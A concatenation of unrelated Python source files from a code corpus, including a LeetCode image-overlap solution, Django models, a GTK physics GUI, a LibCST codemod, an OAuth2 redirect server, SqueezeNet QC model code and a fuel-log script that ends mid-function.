print()
|
StarcoderdataPython
|
41654
|
<filename>835.Image-Overlap.py
# https://leetcode.com/problems/image-overlap/description/
#
# algorithms
# Medium (42.6%)
# Total Accepted: 4.8k
# Total Submissions: 11.2k
# beats 77.52% of python submissions
class Solution(object):
def largestOverlap(self, A, B):
"""
:type A: List[List[int]]
:type B: List[List[int]]
:rtype: int
"""
length = len(A)
A_1_arr, B_1_arr = [], []
for i in xrange(length):
for j in xrange(length):
if A[i][j] == 1:
A_1_arr.append((i, j))
if B[i][j] == 1:
B_1_arr.append((i, j))
res = 0
for i in xrange(length):
for j in xrange(length):
cnt_sum_A, cnt_sum_B = 0, 0
for x, y in A_1_arr:
if x + i < length and y + j < length and B[x + i][y + j] == 1:
cnt_sum_A += 1
for x, y in B_1_arr:
if x + i < length and y + j < length and A[x + i][y + j] == 1:
cnt_sum_B += 1
res = max(res, cnt_sum_A, cnt_sum_B)
return res
|
StarcoderdataPython
|
1763716
|
<gh_stars>0
from django.db import models
from users.models import ModelTemplate,Departments
# Create your models here.
class Unit(ModelTemplate):
name=models.CharField(max_length=50,default=None)
class Meta:
ordering = ['created_date']
class Product_category(ModelTemplate):
name=models.CharField(max_length=50,default=None)
code=models.CharField(max_length=50,default=None)
Departments_id=models.ForeignKey(Departments,on_delete=models.CASCADE)
class Meta:
ordering = ['created_date']
|
StarcoderdataPython
|
3236341
|
<gh_stars>1-10
from django.core.wsgi import get_wsgi_application
from brouwers.setup import setup_env
setup_env()
application = get_wsgi_application()
|
StarcoderdataPython
|
42753
|
<gh_stars>10-100
import pygtk
import gtk
import IO
import numpy
class TilingMatrix(gtk.Frame):
def __init__(self):
gtk.Frame.__init__(self, 'Orbital tiling')
self.matrix = numpy.array([[1,0,0],[0,1,0],[0,0,1]])
self.set_label('Orbital tiling')
self.TileTable = gtk.Table(3,3)
self.TileOrbitals = gtk.CheckButton('Tile orbitals')
self.TileOrbitals.set_active(False)
self.TileOrbitals.connect("toggled", self.tile_toggled)
self.TileButtons = []
for i in range(0,3):
TileList = []
for j in range(0,3):
tile = gtk.SpinButton\
(gtk.Adjustment(0.0, -100.0, 100.0, 1.0, 2.0))
if (i == j):
tile.set_value(self.matrix[i,j])
tile.set_digits(0)
tile.set_width_chars(2)
tile.connect('value_changed', self.matrix_changed)
self.TileTable.attach(tile, i, i+1, j, j+1)
TileList.append(tile)
self.TileButtons.append(TileList)
vbox = gtk.VBox()
self.UnitLabel = gtk.Label()
self.UnitLabel.set_text('Unit cells: 1')
vbox.pack_start(self.TileOrbitals)
vbox.pack_start(self.TileTable)
vbox.pack_start(self.UnitLabel)
self.TileTable.set_sensitive(False)
self.add(vbox)
def matrix_changed(self, button):
units = self.get_units()
self.UnitLabel.set_text('Unit cells: %d' %(units))
def get_units(self):
mat = self.get_matrix()
units = numpy.abs(numpy.linalg.det(mat))
return units
def get_matrix(self):
mat = []
for i in range(0,3):
row = []
for j in range(0,3):
row.append(int(self.TileButtons[i][j].get_value()))
mat.append(row)
return numpy.array(mat)
    def set_matrix(self, mat):
        for i in range(0,3):
            for j in range(0,3):
                self.TileButtons[i][j].set_value(mat[i][j])
def tile_toggled(self, button):
self.TileTable.set_sensitive(button.get_active())
class Orbitals(gtk.Frame):
def h5_chosen_callback(self, fileDialog, response):
if (response == gtk.RESPONSE_ACCEPT):
filename = self.FileButton.get_filename()
# Check to see if the file is a valid PP file
okay = self.read_h5_file(filename)
def read_eshdf (self, io):
# Read primitive lattice
io.OpenSection('supercell')
self.prim_vecs = io.ReadVar('primitive_vectors')
a = numpy.max(numpy.abs(self.prim_vecs))
io.CloseSection()
self.Geometry.LatticeFrame.set_lattice(self.prim_vecs)
self.Geometry.LatticeFrame.ArbRadio.set_active(True)
# Read atom species
io.OpenSection('atoms')
num_species = io.ReadVar ('number_of_species')
oldtypes = self.Geometry.Types.GetElementTypes()
# for t in oldtypes:
# self.Geometry.Types.Remove
TypeList = []
for isp in range(0,num_species):
io.OpenSection('species')
Z = io.ReadVar('atomic_number')
Zion = io.ReadVar('valence_charge')
symbol = self.Geometry.Types.Elements.ElementList[Z-1][1]
TypeList.append(symbol)
row = self.Geometry.Types.AddRow(None)
row.set_elem (symbol, Z)
if (Zion != Z):
row.combo.set_active(1)
io.CloseSection()
# Read atom positions
N = io.ReadVar('number_of_atoms')
self.Geometry.AtomPos.set_num_atoms(N)
pos = io.ReadVar('reduced_positions')
self.Geometry.AtomPos.set_atom_positions(pos)
for symbol in TypeList:
self.Geometry.AtomPos.AddTypeCallback(None, symbol)
io.CloseSection()
def read_h5_file(self, filename):
io = IO.IOSectionClass()
if (not io.OpenFile(filename)):
return False
format = io.ReadVar('format')
if (format == 'ES-HDF'):
return self.read_eshdf (io)
return False
def __init__(self, geometry):
self.Geometry = geometry
gtk.Frame.__init__(self, "Orbitals")
# Setup orbital HDF5 file chooser
filter = gtk.FileFilter()
filter.add_pattern("*.h5")
filter.set_name ("XML files")
buttons = (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,\
gtk.STOCK_OPEN,gtk.RESPONSE_ACCEPT)
self.FileDialog = gtk.FileChooserDialog \
("Select orbital file", buttons=buttons)
self.FileDialog.set_action(gtk.FILE_CHOOSER_ACTION_OPEN)
self.FileDialog.connect("response", self.h5_chosen_callback)
self.FileButton = gtk.FileChooserButton(self.FileDialog)
self.FileButton.add_filter(filter)
self.FileButton.set_sensitive(True)
self.FileButton.set_action (gtk.FILE_CHOOSER_ACTION_OPEN)
filebox = gtk.HBox(True)
vbox = gtk.VBox(True)
self.TileFrame = TilingMatrix()
filebox.pack_start(self.FileButton, True, False)
filebox.pack_start(self.TileFrame , True, False)
self.add(filebox)
def tile_matrix_changed(self, button):
print
class Jastrows(gtk.Frame):
def __init__(self):
gtk.Frame.__init__(self, "Jastrow correlation functions")
class Wavefunction(gtk.VBox):
def __init__(self, geometry):
gtk.VBox.__init__(self)
self.OrbitalsFrame = Orbitals(geometry)
self.pack_start (self.OrbitalsFrame, False, False, 4)
self.Geometry = geometry
self.JastrowsFrame = Jastrows()
self.pack_start (self.JastrowsFrame, False, False, 4)
# self.Widgets.append (self.FileButton)
|
StarcoderdataPython
|
20837
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
# pyre-strict
from typing import Union
import libcst
import libcst.matchers as m
from libcst import parse_expression
from libcst.codemod import VisitorBasedCodemodCommand
from libcst.codemod.visitors import AddImportsVisitor
from libcst.metadata import QualifiedNameProvider
class StripStringsCommand(VisitorBasedCodemodCommand):
DESCRIPTION: str = "Converts string type annotations to 3.7-compatible forward references."
METADATA_DEPENDENCIES = (QualifiedNameProvider,)
# We want to gate the SimpleString visitor below to only SimpleStrings inside
# an Annotation.
@m.call_if_inside(m.Annotation())
# We also want to gate the SimpleString visitor below to ensure that we don't
# erroneously strip strings from a Literal.
@m.call_if_not_inside(
m.Subscript(
# We could match on value=m.Name("Literal") here, but then we might miss
# instances where people are importing typing_extensions directly, or
# importing Literal as an alias.
value=m.MatchMetadataIfTrue(
QualifiedNameProvider,
lambda qualnames: any(
qualname.name == "typing_extensions.Literal"
for qualname in qualnames
),
)
)
)
def leave_SimpleString(
self, original_node: libcst.SimpleString, updated_node: libcst.SimpleString
) -> Union[libcst.SimpleString, libcst.BaseExpression]:
AddImportsVisitor.add_needed_import(self.context, "__future__", "annotations")
# Just use LibCST to evaluate the expression itself, and insert that as the
# annotation.
return parse_expression(
updated_node.evaluated_value, config=self.module.config_for_parsing
)
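# -----------------------------------------------------------------------------
# Hedged usage sketch (not part of the original command): run the codemod over
# an in-memory module with a fresh CodemodContext. The source string is a
# made-up example.
if __name__ == "__main__":
    from libcst.codemod import CodemodContext

    source = "def f(x: 'MyType') -> 'MyType':\n    return x\n"
    command = StripStringsCommand(CodemodContext())
    print(command.transform_module(libcst.parse_module(source)).code)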
|
StarcoderdataPython
|
1679565
|
from onshape_client.compatible_imports import HTTPServer, HTTPHandler, sendable
def start_server(authorization_callback, open_grant_authorization_page_callback):
"""
:param authorization_callback: The function to call once with the authorization URL response
:param open_grant_authorization_page_callback: The function to call when the server starts - for example opening a webpage
:return:
"""
ServerClass = MakeServerClass(open_grant_authorization_page_callback)
server = ServerClass(
("localhost", 9000), MakeHandlerWithCallbacks(authorization_callback)
)
server.serve_forever()
def MakeServerClass(open_grant_authorization_page_callback):
class OAuth2RedirectServer(HTTPServer, object):
def server_activate(self):
super(OAuth2RedirectServer, self).server_activate()
open_grant_authorization_page_callback()
return OAuth2RedirectServer
def MakeHandlerWithCallbacks(authorization_callback):
class OAuth2RedirectHandler(HTTPHandler):
def do_GET(self):
try:
# Say we are at an https port so that OAuth package doesn't complain. This isn't a security concern because
# it is just so that the authorization code is correctly parsed.
print("path:"+str(self.path))
authorization_callback(authorization_response="https://localhost" + self.path)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
content = """
<html><head><title>Success!</title></head>
<body><p>You successfully authorized the application, and your authorization url is: {}</p>
<p>You may close this tab.</p>
</body></html>
""".format(
self.path
)
self.wfile.write(sendable(content))
except BaseException as e:
self.send_response(500)
self.send_header("Content-type", "text/html")
self.end_headers()
content = """
<html><head><title>Error!</title></head>
<body><p>Something happened and here is what we know: {}</p>
<p>You may close this tab.</p>
</body></html>
""".format(
e
)
self.wfile.write(sendable(content))
import threading
assassin = threading.Thread(target=self.server.shutdown)
assassin.daemon = True
assassin.start()
return OAuth2RedirectHandler
|
StarcoderdataPython
|
4808450
|
# Copyright The Linux Foundation and each contributor to CommunityBridge.
# SPDX-License-Identifier: MIT
import json
import os
from http import HTTPStatus
from unittest.mock import Mock, patch, MagicMock
import pytest
import cla
from cla.models.dynamo_models import UserPermissions
from cla.salesforce import get_projects, get_project
@pytest.fixture()
def user():
""" Patch authenticated user """
with patch("cla.auth.authenticate_user") as mock_user:
mock_user.username.return_value = "test_user"
yield mock_user
@pytest.fixture()
def user_permissions():
""" Patch permissions """
with patch("cla.salesforce.UserPermissions") as mock_permissions:
yield mock_permissions
@patch.dict(cla.salesforce.os.environ,{'CLA_BUCKET_LOGO_URL':'https://s3.amazonaws.com/cla-project-logo-dev'})
@patch("cla.salesforce.requests.get")
def test_get_salesforce_projects(mock_get, user, user_permissions):
""" Test getting salesforce projects via project service """
#breakpoint()
cla.salesforce.get_access_token = Mock(return_value=("token", HTTPStatus.OK))
sf_projects = [
{
"Description": "Test Project 1",
"ID": "foo_id_1",
"ProjectLogo": "https://s3/logo_1",
"Name": "project_1",
},
{
"Description": "Test Project 2",
"ID": "foo_id_2",
"ProjectLogo": "https://s3/logo_2",
"Name": "project_2",
},
]
user_permissions.projects.return_value = set({"foo_id_1", "foo_id_2"})
# Fake event
event = {"httpMethod": "GET", "path": "/v1/salesforce/projects"}
# Mock project service response
response = json.dumps({"Data": sf_projects})
mock_get.return_value.text = response
mock_get.return_value.status_code = HTTPStatus.OK
expected_response = [
{
"name": "project_1",
"id": "foo_id_1",
"description": "Test Project 1",
"logoUrl": "https://s3.amazonaws.com/cla-project-logo-dev/foo_id_1.png"
},
{
"name": "project_2",
"id": "foo_id_2",
"description": "Test Project 2",
"logoUrl": "https://s3.amazonaws.com/cla-project-logo-dev/foo_id_2.png"
},
]
assert get_projects(event, None)["body"] == json.dumps(expected_response)
@patch.dict(cla.salesforce.os.environ,{'CLA_BUCKET_LOGO_URL':'https://s3.amazonaws.com/cla-project-logo-dev'})
@patch("cla.salesforce.requests.get")
def test_get_salesforce_project_by_id(mock_get, user, user_permissions):
""" Test getting salesforce project given id """
# Fake event
event = {
"httpMethod": "GET",
"path": "/v1/salesforce/project/",
"queryStringParameters": {"id": "foo_id"},
}
sf_projects = [
{
"Description": "Test Project",
"ID": "foo_id",
"ProjectLogo": "https://s3/logo_1",
"Name": "project_1",
},
]
user_permissions.return_value.to_dict.return_value = {"projects": set(["foo_id"])}
mock_get.return_value.json.return_value = {"Data": sf_projects}
mock_get.return_value.status_code = HTTPStatus.OK
expected_response = {
"name": "project_1",
"id": "foo_id",
"description": "Test Project",
"logoUrl": "https://s3.amazonaws.com/cla-project-logo-dev/foo_id.png"
}
assert get_project(event, None)["body"] == json.dumps(expected_response)
|
StarcoderdataPython
|
1767200
|
from multiprocessing import Pool
import itertools
def chunks(l, n):
count = 0
for i in range(0, len(l), n):
yield l[i: i + n], count
count += 1
def multiprocessing(strings, function, cores=16):
df_split = chunks(strings, len(strings) // cores)
pool = Pool(cores)
pooled = pool.map(function, df_split)
pool.close()
pool.join()
|
StarcoderdataPython
|
1759439
|
<reponame>adswa/PyNIDM
from .Core import Core
from .Project import Project
from .Session import Session
from .Acquisition import Acquisition
from .AssessmentAcquisition import AssessmentAcquisition
from .MRAcquisition import MRAcquisition
from .AcquisitionObject import AcquisitionObject
from .MRObject import MRObject
from .DemographicsObject import DemographicsObject
from .AssessmentObject import AssessmentObject
|
StarcoderdataPython
|
185311
|
<gh_stars>0
# coding: utf-8
import os
from lib import *
from tqdm import tqdm
# Vigenere complexity : O(n^4 + n^3 + n^2 + n)
# Cesar complexity : O(n^2(n+1)/2 + n)
def auto_decipher(code, n):
if max(freq(code).items(), key=operator.itemgetter(1))[0] == ' ':
method = scytale
else:
method = vigenere
print(method)
for i in tqdm(range(1, n)):
dc = method(code, i)
if "Joël" in dc : # Choose a word wich could the most probably appear in the message
f = open("D:/code/UE_Crypto_Charpak/message_decrypted.txt", "a", encoding='UTF-8')
f.write(dc)
f.close()
print(dc)
break
def decipher(code,method, n):
for i in tqdm(range(1, n)):
dc = method(code, i)
if "Joël" in dc : # Choose a word wich could the most probably appear in the message
f = open("D:/code/UE_Crypto_Charpak/message_decrypted.txt", "a")
f.close()
print(dc)
break
#decipher(read("D:/code/UE_Crypto_Charpak/Codes/message1.txt"),scytale ,len(read("D:/code/UE_Crypto_Charpak/Codes/message1.txt")))
#decipher(read("D:/code/UE_Crypto_Charpak/Codes/message7.txt"),vigenere, 100)
#auto_decipher(read("D:/code/UE_Crypto_Charpak/Codes/message1.txt") ,len(read("D:/code/UE_Crypto_Charpak/Codes/message1.txt")))
#auto_decipher(read("D:/code/UE_Crypto_Charpak/Codes/message7.txt"), 100)
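# -----------------------------------------------------------------------------
# Hedged sketch of the dispatch heuristic used by auto_decipher above, shown
# with the standard library only (freq/scytale/vigenere come from the local
# `lib` module, which is not reproduced here).
if __name__ == "__main__":
    from collections import Counter
    sample = "lorem ipsum dolor sit amet"
    most_common_char = Counter(sample).most_common(1)[0][0]
    print("scytale" if most_common_char == " " else "vigenere")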
|
StarcoderdataPython
|
169572
|
# Takes RAW arrays and returns calculated OD for given shot
# along with the best fit (between gaussian and TF) for ROI.
from __future__ import division
from lyse import *
from pylab import *
from common.fit_gaussian_2d import fit_2d
from common.traces import *
from spinor.aliases import *
from time import time
from scipy.ndimage import *
from mpl_toolkits.axes_grid1 import make_axes_locatable
from common.OD_handler import ODShot
import os
import pandas as pd
import numpy as np
import numexpr as ne
import matplotlib.gridspec as gridspec
import fit_table
from analysislib.common.get_raw_images import get_raw_images
# Parameters
pixel_size = 5.6e-6/5.33# Divided by Magnification Factor
# 5.6e-6/5.33 for z in situ # Yuchen and Paco: 08/19/2016
#5.6e-6/3.44 for z TOF # Yuchen and Paco: 08/19/2016
#5.6e-6/2.72 for x-in situ # Paco: 05/06/2016
sigma0 = 3*(780e-9)**2/(2*3.14)
# Time stamp
print '\nRunning %s' % os.path.basename(__file__)
t = time()
# Load dataframe
run = Run(path)
# Methods
def print_time(text):
print 't = %6.3f : %s' % ((time()-t), text)
def raw_to_OD(fpath):
reconstruction_group = 'reconstruct_images'
atoms, probe, bckg = get_raw_images(fpath)
rchi2_item = (reconstruction_group, 'reconstructed_probe_rchi2')
df = data(fpath)
if rchi2_item in df and not np.isnan(df[rchi2_item]):
with h5py.File(fpath) as f:
if reconstruction_group in f['results']:
probe = run.get_result_array('reconstruct_images', 'reconstructed_probe')
bckg = run.get_result_array('reconstruct_images', 'reconstructed_background')
div = np.ma.masked_invalid((atoms - bckg)/(probe - bckg))
div = np.ma.masked_less_equal(div, 0.)
another_term = 0 # (probe-atoms)/(Isat)
alpha = 1.0
calculated_OD = np.array(-alpha*np.log(div) + another_term)
return np.matrix(calculated_OD)
# Main
try:
#plt.xkcd()
with h5py.File(path) as h5_file:
if '/data' in h5_file:
print_time('Calculating OD...')
# Get OD
_OD_ = raw_to_OD(path)
print_time('Get OD...')
OD = ODShot(_OD_)
F, mF, _ROI_, BCK_a = OD.get_ROI(sniff=False, get_background=False)
_, _, ROIcoords, _ = np.load(r'C:\labscript_suite\userlib\analysislib\paco_analysis\ROI_temp.npy')
point1, point2 = ROIcoords
x1, y1 = point1
x2, y2 = point2
ROI = ODShot(_ROI_)
BCK = np.mean(BCK_a)*np.ones(_ROI_.shape)
run.save_result( 'pkOD', (np.amax(_ROI_.astype(float16))))
# Compute number
if True: #stored == "z-TOF":
N = (np.sum((_ROI_-BCK)/sigma0)*pixel_size**2)
print 0.2*pixel_size**2/sigma0
run.save_result(('N_(' + str(F) +',' +str(mF)+')'), N)
else:
N = 0
# Display figure with shot, slices and fits and N
fig = figure(figsize=(8, 5), frameon=False)
gs = gridspec.GridSpec(2, 2, width_ratios=[1,2], height_ratios=[4,1])
subplot(gs[2])
str = r'N = %.0f' % N
text(0.4, 0.6, str, ha='center', va='top',fontsize=18)
gca().axison = False
tight_layout()
# OD and ROI display
subplot(gs[1])
im0= imshow(_OD_, vmin= -0.0, vmax = 0.4, cmap='viridis', aspect='equal', interpolation='none')
#axvline(x1, color='r')
#axvline(x2, color='r')
#axhline(y1, color='r')
#axhline(y2, color='r')
divider = make_axes_locatable(gca())
cax = divider.append_axes("right", "5%", pad="3%")
colorbar(im0, cax=cax)
title('OD')
tight_layout()
            # Raw data is displayed; if fits are unsuccessful, only show raw data.
# Slice
print_time('Slice and fit...')
xcolOD, x_ax = OD.slice_by_segment_OD(coord_a=np.array([170, 100]), coord_b=np.array([170, 600]))
ycolOD, y_ax = OD.slice_by_segment_OD(coord_a=np.array([50, 322]), coord_b=np.array([300, 322]))
y_ax=y_ax[::-1]
            # Raw data is displayed; if fits are unsuccessful, only show raw data.
# Gaussian 1D
x_gaussian_par, dx_gaussian_par = fit_gaussian(x_ax, xcolOD)
y_gaussian_par, dy_gaussian_par = fit_gaussian(y_ax, ycolOD)
run.save_result('x_gauss_width', np.abs(x_gaussian_par[2]*pixel_size/(1e-6*4*np.log(2))))
run.save_result('y_gauss_width', np.abs(y_gaussian_par[2]*pixel_size/(1e-6*4*np.log(2))))
run.save_result('2dwidth', np.sqrt(x_gaussian_par[2]**2+y_gaussian_par[2]**2))
run.save_result('gauss_amp', np.abs(x_gaussian_par[0]-x_gaussian_par[3]))
run.save_result('x_gauss_center', np.where(xcolOD == np.amax(xcolOD))[0][0])
run.save_result('y_gauss_center', (480-y_gaussian_par[1])*5.6e-6)
run.save_result('integrated_linOD', np.sum(xcolOD))
print 'x Gaussian fit'
#fit_table.get_params(dx_gaussian_par)
print 'y Gaussian fit'
#fit_table.get_params(dy_gaussian_par)
x_gaussian_fit = gaussian(x_ax, x_gaussian_par[0], x_gaussian_par[1], x_gaussian_par[2], x_gaussian_par[3])
y_gaussian_fit = gaussian(y_ax, y_gaussian_par[0], y_gaussian_par[1], y_gaussian_par[2], y_gaussian_par[3])
if (x_gaussian_fit is not None or y_gaussian_fit is not None):
                # Thomas-Fermi 1D
print_time('Gauss fit successful for x and y')
x_tf_par, dx_tf_par = fit_thomas_fermi(x_ax, xcolOD)
y_tf_par, dy_tf_par = fit_thomas_fermi(y_ax, ycolOD)
print 'x Thomas Fermi fit'
fit_table.get_params(dx_tf_par)
                print 'y Thomas Fermi fit'
fit_table.get_params(dy_tf_par)
x_tf_fit = thomas_fermi(x_ax, x_tf_par[0], x_tf_par[1], x_tf_par[2], x_tf_par[3])
y_tf_fit = thomas_fermi(y_ax, y_tf_par[0], y_tf_par[1], y_tf_par[2], y_tf_par[3])
run.save_result('ATF', (x_tf_par[2]**2+y_tf_par[2]**2))
if(x_tf_fit is not None or y_tf_fit is not None):
print_time('TF fit successful for x and y')
subplot(gs[3])
plot(x_ax, xcolOD, 'b', x_ax, x_gaussian_fit, 'r', x_ax, (x_tf_fit), 'g')
xlabel('xpos (um)')
ylabel('OD')
title('x_slice')
#axis([0, 600, -0.4, 2.0])
tight_layout()
subplot(gs[0])
plot(ycolOD, y_ax, y_gaussian_fit, y_ax, 'r', y_tf_fit, y_ax, 'g')
xlabel('OD')
ylabel('ypos (um)')
title('y_slice')
#axis([-0.4, 2.0, 600, 0])
tight_layout()
show()
run.save_result('TF_width', np.abs(2*y_tf_par[2]*pixel_size/(1e-6)))
#omega_par = np.sqrt(3*N*1.05e-34*2*pi*30e3*5.3e-9/(1.44e-25*(x_tf_par[2]*1.7/(2*1e6))**3))/(2*pi)
#run.save_result('freq_long', omega_par)
else:
raise Exception ('Can only do Gaussian fit')
subplot(gs[3])
plot(x_ax, xcolOD, 'b', x_ax, x_gaussian_fit, 'r')
xlabel('xpos (um)')
ylabel('OD')
title('x_slice')
#axis([0, 600, -0.4, 2.0])
tight_layout()
subplot(gs[0])
plot(ycolOD, y_ax, y_gaussian_fit, y_ax, 'r')
xlabel('OD')
ylabel('ypos (um)')
title('y_slice')
#axis([-0.4, 2.0, 600, 0])
tight_layout()
show()
run.save_result('gauss_amp', np.abs(y_gaussian_par[0]))
else:
raise Exception ('Can\'t fit')
print_time('Gauss fit unsuccessful for x or y')
subplot(gs[3])
plot(x_ax, xcolOD)
xlabel('xpos (um)')
ylabel('OD')
title('x_slice')
#axis([0, 600, -0.4, 2.0])
tight_layout()
subplot(gs[0])
plot(ycolOD, y_ax)
xlabel('OD')
ylabel('ypos (um)')
title('y_slice')
#axis([-0.4, 2.0, 600, 0])
tight_layout()
show()
else:
print_time('Unsuccessful...')
raise Exception( 'No image found in file...' )
print '\n ********** Successful **********\n\n'
except Exception as e:
print '%s' %e + os.path.basename(path)
print '\n ********** Not Successful **********\n\n'
|
StarcoderdataPython
|
1665805
|
<reponame>felliott/modular-odm
import os
from modularodm import fields, StoredObject
from modularodm.query.query import RawQuery as Q
from tests.base import ModularOdmTestCase
# TODO: The following are defined in MongoStorage, but not PickleStorage:
# 'istartswith'
# 'iendswith',
# 'exact',
# 'iexact'
class StringComparisonTestCase(ModularOdmTestCase):
def define_objects(self):
class Foo(StoredObject):
_id = fields.IntegerField(primary=True)
string_field = fields.StringField()
return Foo,
def set_up_objects(self):
self.foos = []
field_values = (
'first value',
'second value',
'third value',
)
for idx in range(len(field_values)):
foo = self.Foo(
_id=idx,
string_field=field_values[idx],
)
foo.save()
self.foos.append(foo)
def tear_down_objects(self):
try:
os.remove('db_Test.pkl')
except OSError:
pass
def test_contains(self):
""" Finds objects with the attribute containing the substring."""
result = self.Foo.find(
Q('string_field', 'contains', 'second')
)
self.assertEqual(len(result), 1)
def test_icontains(self):
""" Operates as ``contains``, but ignores case."""
result = self.Foo.find(
Q('string_field', 'icontains', 'SeCoNd')
)
self.assertEqual(len(result), 1)
def test_startwith(self):
""" Finds objects where the attribute begins with the substring """
result = self.Foo.find(
Q('string_field', 'startswith', 'second')
)
self.assertEqual(len(result), 1)
def test_endswith(self):
""" Finds objects where the attribute ends with the substring """
result = self.Foo.find(
Q('string_field', 'endswith', 'value')
)
self.assertEqual(len(result), 3)
|
StarcoderdataPython
|
3338574
|
<filename>hat/audit/admin.py
from django.contrib import admin
from .models import Modification
class ModificationAdmin(admin.ModelAdmin):
date_hierarchy = "created_at"
list_filter = ("content_type", "source")
search_fields = ("user",)
admin.site.register(Modification, ModificationAdmin)
|
StarcoderdataPython
|
3215762
|
<reponame>glomerulus-lab/nonnegative_connectome
import scipy.io
experiments = ["../data/nonnegative_top_view_top_view_100_tol_e-4_e-5", "../data/nonnegative_flatmap_flatmap_100_tol_e-4_e-5", "data/nonnegative_top_view_top_view_100_tol_e-5", "data/nonnegative_flatmap_flatmap_100_tol_e-5"]
for experiment in experiments:
data = scipy.io.loadmat(experiment)
print(data["time_refining"], data["time_final_solution"], data["cost_final"])
|
StarcoderdataPython
|
171617
|
<filename>clinicadl/clinicadl/preprocessing/model/squezenet_qc.py
import torch
import torch.nn as nn
import math
import torch.utils.model_zoo as model_zoo
import torch.nn.init as init
from torchvision import models
from torch.nn.parameter import Parameter
# based on https://github.com/pytorch/vision/blob/master/torchvision/models/squeezenet.py
class Fire(nn.Module):
def __init__(self, inplanes, squeeze_planes,
expand1x1_planes, expand3x3_planes):
super(Fire, self).__init__()
self.inplanes = inplanes
self.squeeze = nn.Conv2d(inplanes, squeeze_planes, kernel_size=1)
self.squeeze_activation = nn.ReLU(inplace=True)
self.expand1x1 = nn.Conv2d(squeeze_planes, expand1x1_planes,
kernel_size=1)
self.expand1x1_activation = nn.ReLU(inplace=True)
self.expand3x3 = nn.Conv2d(squeeze_planes, expand3x3_planes,
kernel_size=3, padding=1)
self.expand3x3_activation = nn.ReLU(inplace=True)
def forward(self, x):
x = self.squeeze_activation(self.squeeze(x))
return torch.cat([
self.expand1x1_activation(self.expand1x1(x)),
self.expand3x3_activation(self.expand3x3(x))
], 1)
class SqueezeNetQC(nn.Module):
def __init__(self, version=1.0, num_classes=2, use_ref=False):
super(SqueezeNetQC, self).__init__()
self.use_ref = use_ref
self.feat = 3
if version not in [1.0, 1.1]:
raise ValueError("Unsupported SqueezeNet version {version}:"
"1.0 or 1.1 expected".format(version=version))
self.num_classes = num_classes
if version == 1.0:
self.features = nn.Sequential(
nn.Conv2d(2 if use_ref else 1, 96, kernel_size=7, stride=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(96, 16, 64, 64),
Fire(128, 16, 64, 64),
Fire(128, 32, 128, 128),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(256, 32, 128, 128),
Fire(256, 48, 192, 192),
Fire(384, 48, 192, 192),
Fire(384, 64, 256, 256),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(512, 64, 256, 256),
)
else:
self.features = nn.Sequential(
nn.Conv2d(2 if use_ref else 1, 64, kernel_size=3, stride=2),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(64, 16, 64, 64),
Fire(128, 16, 64, 64),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(128, 32, 128, 128),
Fire(256, 32, 128, 128),
nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),
Fire(256, 48, 192, 192),
Fire(384, 48, 192, 192),
Fire(384, 64, 256, 256),
Fire(512, 64, 256, 256),
)
        # Final convolution is initialized differently from the rest
final_conv = nn.Conv2d(512*self.feat, self.num_classes, kernel_size=1)
self.classifier = nn.Sequential(
nn.Dropout(p=0.5),
final_conv,
nn.ReLU(inplace=True),
nn.AvgPool2d(13, stride=1)
)
for m in self.modules():
if isinstance(m, nn.Conv2d):
if m is final_conv:
                    init.normal_(m.weight.data, mean=0.0, std=0.01)
else:
                    init.kaiming_uniform_(m.weight.data)
if m.bias is not None:
m.bias.data.zero_()
def forward(self, x):
# split feats into batches, so each view is passed separately
x = x.view(-1, 2 if self.use_ref else 1 ,224,224)
x = self.features(x)
# reshape input to take into account 3 views
x = x.view(-1, 512*self.feat,13,13)
x = self.classifier(x)
return x.view(x.size(0), self.num_classes)
def load_from_std(self, std_model):
        # import weights from the standard SqueezeNet model
# TODO: finish
# first load all standard items
own_state = self.state_dict()
for name, param in std_model.state_dict().items():
if name == 'features.0.weight':
if isinstance(param, Parameter):
param = param.data
# convert to mono weight
                # collapse parameters along the second dimension, emulating a grayscale input
mono_param=param.sum( 1, keepdim=True )
if self.use_ref:
own_state[name].copy_( torch.cat((mono_param,mono_param),1) )
else:
own_state[name].copy_( mono_param )
pass
elif name == 'classifier.1.weight' or name == 'classifier.1.bias':
# don't use at all
pass
elif name in own_state:
if isinstance(param, Parameter):
param = param.data
try:
own_state[name].copy_(param)
except Exception:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
def squeezenet_qc(pretrained=False, **kwargs):
"""Constructs a SqueezeNet 1.1 model
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = SqueezeNetQC(version=1.1, **kwargs)
if pretrained:
        # load the pretrained SqueezeNet 1.1 model
model_ft = models.squeezenet1_1(pretrained=True)
model.load_from_std(model_ft)
return model
|
StarcoderdataPython
|
1787417
|
import datetime
import fuel
def update_refueling_list():
r0 = fuel.Refueling.all().order('odo').get()
if r0.odo > 0:
new_r0 = fuel.Refueling(date=datetime.datetime.combine(r0.date.date(),datetime.time(0,0,0)), odo=0, liters=0.0)
new_r0.save()
rest_liters = list(fuel.Refueling.all().order('odo'))
run_restliter_algo(rest_liters)
for rl in rest_liters: rl.save()
def run_restliter_algo(refuelings):
def smooth_forward(refuelings,convergence_speed=0.8,tank_size = None):
if tank_size is None:
tank_size = max(x.liters for x in refuelings)
start_average = _get_average(refuelings,1)
update_low(refuelings,0,start_average,convergence_speed,tank_size)
for i in xrange(len(refuelings)-2):
update_high(refuelings,i,_get_average(refuelings,i+1),convergence_speed,tank_size)
def smooth_backward(refuelings,convergence_speed=0.5,tank_size = None):
if tank_size is None:
tank_size = max(x.liters for x in refuelings)
start_average = _get_average(refuelings,len(refuelings)-3)
update_high(refuelings,len(refuelings)-2,start_average,convergence_speed + (1-convergence_speed) * 0.5 ,tank_size)
for i in xrange(len(refuelings)-2,1,-1):
